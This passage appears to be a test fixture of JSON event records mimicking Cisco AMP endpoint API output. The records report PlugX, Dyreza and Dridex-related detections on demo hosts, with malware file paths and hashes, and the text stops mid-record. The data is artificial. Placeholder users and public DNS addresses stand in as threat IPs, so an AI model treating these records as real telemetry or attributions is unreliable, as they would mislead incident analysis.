+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180333329057841000,"timestamp":1610705264,"timestamp_nanoseconds":171000000,"date":"2021-01-15T10:07:44+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180333329057841154","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55721,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180333329057841000,"timestamp":1610705264,"timestamp_nanoseconds":47000000,"date":"2021-01-15T10:07:44+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180333324762873857","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55720,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6155907656771961000,"timestamp":1610705263,"timestamp_nanoseconds":912000000,"date":"2021-01-15T10:07:43+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Trojan.PlugX.72.tht.VRT","detection_id":"6155907656771960835","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Plugx","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"98:0d:93:45:27:11"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"McUtil.DLL","file_path":"\\\\?\\C:\\Documents and Settings\\All Users\\VirusMap\\McUtil.DLL","identity":{"sha256":"0a99238e1ebebc47d7a89b2ccddfae537479f7f77322b5d4941315d3f7e5ca48","sha1":"ae0f9bf2740d00c5d485827eb32aca33feaa3a90","md5":"ad4a646b38a482cc07d5b09b4fffd3b3"},"parent":{"process_id":1428,"disposition":"Clean","file_name":"mcvsmap.exe","identity":{"sha256":"ae16e10e621d6610a3f7f2c7122f9d1263700ba02d1b90e42798decb2fe84096","sha1":"9224de3af2a246011c6294f64f27206d165317ba","md5":"4e1e0b8b0673937415599bf2f24c44ad"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6155907656771961000,"timestamp":1610705263,"timestamp_nanoseconds":162000000,"date":"2021-01-15T10:07:43+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Trojan.PlugX.72.tht.VRT","detection_id":"6155907656771960834","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Plugx","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"98:0d:93:45:27:11"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"McUtil.DLL","file_path":"\\\\?\\C:\\Documents and Settings\\John Smith\\Local Settings\\Temp\\RarSFX1\\McUtil.DLL","identity":{"sha256":"0a99238e1ebebc47d7a89b2ccddfae537479f7f77322b5d4941315d3f7e5ca48","sha1":"ae0f9bf2740d00c5d485827eb32aca33feaa3a90","md5":"ad4a646b38a482cc07d5b09b4fffd3b3"},"parent":{"process_id":3596,"disposition":"Malicious","file_name":"ps.exe","identity":{"sha256":"ff4592e89b434b3fca5dabd5210d9bf17ae8c1d912c2d29007c55dbea0aa8cae","sha1":"080cf73cdd9a318f958cd5e730579d84d6a1cd26","md5":"2b88f6504fd54bbc454031f255a97cdf"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6155907648182026000,"timestamp":1610705261,"timestamp_nanoseconds":724000000,"date":"2021-01-15T10:07:41+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Trojan.PlugX.72.tht.VRT","detection_id":"6155907648182026241","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Plugx","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"98:0d:93:45:27:11"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ps.exe","file_path":"\\\\?\\C:\\Documents and Settings\\John Smith\\Desktop\\ps.exe","identity":{"sha256":"ff4592e89b434b3fca5dabd5210d9bf17ae8c1d912c2d29007c55dbea0aa8cae","sha1":"080cf73cdd9a318f958cd5e730579d84d6a1cd26","md5":"2b88f6504fd54bbc454031f255a97cdf"},"archived_file":{"disposition":"Malicious","identity":{"sha256":"0a99238e1ebebc47d7a89b2ccddfae537479f7f77322b5d4941315d3f7e5ca48"}},"parent":{"process_id":3896,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b18a0d4beba606bf30f5010ba3c72abafac80d5f303a8bffb24d7f7b78b786e6","sha1":"eadce51c88c8261852c1903399dde742fba2061b","md5":"b60dddd2d63ce41cb8c487fcfbb6419e"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156209700347052000,"timestamp":1610705254,"timestamp_nanoseconds":882000000,"date":"2021-01-15T10:07:34+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156209700347052056","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256485970936000,"timestamp":1610705253,"timestamp_nanoseconds":307000000,"date":"2021-01-15T10:07:33+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256485970935854","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156209670282281000,"timestamp":1610705247,"timestamp_nanoseconds":223000000,"date":"2021-01-15T10:07:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156209670282280983","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256434431328000,"timestamp":1610705241,"timestamp_nanoseconds":295000000,"date":"2021-01-15T10:07:21+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256434431328301","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900178000400,"timestamp":1610705238,"timestamp_nanoseconds":178000000,"date":"2021-01-15T10:07:18+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"GenericKD:Dyreza-tpd","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610705238,"start_date":"2021-01-15T10:07:18+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"7e54dceecd3d3a23a896e971ae4bb9e71a64a5c1c3b77ac1c64241c55c1b95bb"},"parent":{"disposition":"Malicious","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156209605857772000,"timestamp":1610705232,"timestamp_nanoseconds":855000000,"date":"2021-01-15T10:07:12+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156209605857771542","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256391481655000,"timestamp":1610705231,"timestamp_nanoseconds":358000000,"date":"2021-01-15T10:07:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256391481655340","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"VyCoQwOmMNmrVgs.exe","file_path":"\\\\?\\C:\\Windows\\VyCoQwOmMNmrVgs.exe","identity":{"sha256":"7e54dceecd3d3a23a896e971ae4bb9e71a64a5c1c3b77ac1c64241c55c1b95bb","sha1":"5250d75aaa81095512c5160a8e14f941e2022ece","md5":"789b94e94c2793266fe673c578fd8c1b"},"parent":{"process_id":2812,"disposition":"Malicious","file_name":"jwenjktgenwrger234231.exe","identity":{"sha256":"7e54dceecd3d3a23a896e971ae4bb9e71a64a5c1c3b77ac1c64241c55c1b95bb","sha1":"5250d75aaa81095512c5160a8e14f941e2022ece","md5":"789b94e94c2793266fe673c578fd8c1b"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256391481655000,"timestamp":1610705231,"timestamp_nanoseconds":343000000,"date":"2021-01-15T10:07:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256391481655339","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"jwenjktgenwrger234231.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Desktop\\D94038FDE7B0F343931DF8040B\\jwenjktgenwrger234231.exe","identity":{"sha256":"7e54dceecd3d3a23a896e971ae4bb9e71a64a5c1c3b77ac1c64241c55c1b95bb","sha1":"5250d75aaa81095512c5160a8e14f941e2022ece","md5":"789b94e94c2793266fe673c578fd8c1b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256391481655000,"timestamp":1610705231,"timestamp_nanoseconds":280000000,"date":"2021-01-15T10:07:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256391481655338","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"VyCoQwOmMNmrVgs.exe","file_path":"\\\\?\\C:\\Windows\\VyCoQwOmMNmrVgs.exe","identity":{"sha256":"7e54dceecd3d3a23a896e971ae4bb9e71a64a5c1c3b77ac1c64241c55c1b95bb","sha1":"5250d75aaa81095512c5160a8e14f941e2022ece","md5":"789b94e94c2793266fe673c578fd8c1b"},"parent":{"process_id":2812,"disposition":"Malicious","file_name":"jwenjktgenwrger234231.exe","identity":{"sha256":"7e54dceecd3d3a23a896e971ae4bb9e71a64a5c1c3b77ac1c64241c55c1b95bb","sha1":"5250d75aaa81095512c5160a8e14f941e2022ece","md5":"789b94e94c2793266fe673c578fd8c1b"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256391481655000,"timestamp":1610705231,"timestamp_nanoseconds":249000000,"date":"2021-01-15T10:07:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256391481655337","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"jwenjktgenwrger234231.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Desktop\\D94038FDE7B0F343931DF8040B\\jwenjktgenwrger234231.exe","identity":{"sha256":"7e54dceecd3d3a23a896e971ae4bb9e71a64a5c1c3b77ac1c64241c55c1b95bb","sha1":"5250d75aaa81095512c5160a8e14f941e2022ece","md5":"789b94e94c2793266fe673c578fd8c1b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256387186688000,"timestamp":1610705230,"timestamp_nanoseconds":890000000,"date":"2021-01-15T10:07:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256387186688040","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"jwenjktgenwrger234231.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Desktop\\D94038FDE7B0F343931DF8040B\\jwenjktgenwrger234231.exe","identity":{"sha256":"7e54dceecd3d3a23a896e971ae4bb9e71a64a5c1c3b77ac1c64241c55c1b95bb","sha1":"5250d75aaa81095512c5160a8e14f941e2022ece","md5":"789b94e94c2793266fe673c578fd8c1b"},"parent":{"process_id":3652,"disposition":"Malicious","file_name":"webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256387186688000,"timestamp":1610705230,"timestamp_nanoseconds":875000000,"date":"2021-01-15T10:07:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256387186688039","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256387186688000,"timestamp":1610705230,"timestamp_nanoseconds":625000000,"date":"2021-01-15T10:07:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256387186688038","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256382891721000,"timestamp":1610705229,"timestamp_nanoseconds":658000000,"date":"2021-01-15T10:07:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256382891720741","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156209575793000000,"timestamp":1610705225,"timestamp_nanoseconds":195000000,"date":"2021-01-15T10:07:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156209575793000469","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364862671421000,"timestamp":1610705225,"timestamp_nanoseconds":350000000,"date":"2021-01-15T10:07:05+00:00","event_type":"Scan Completed, No 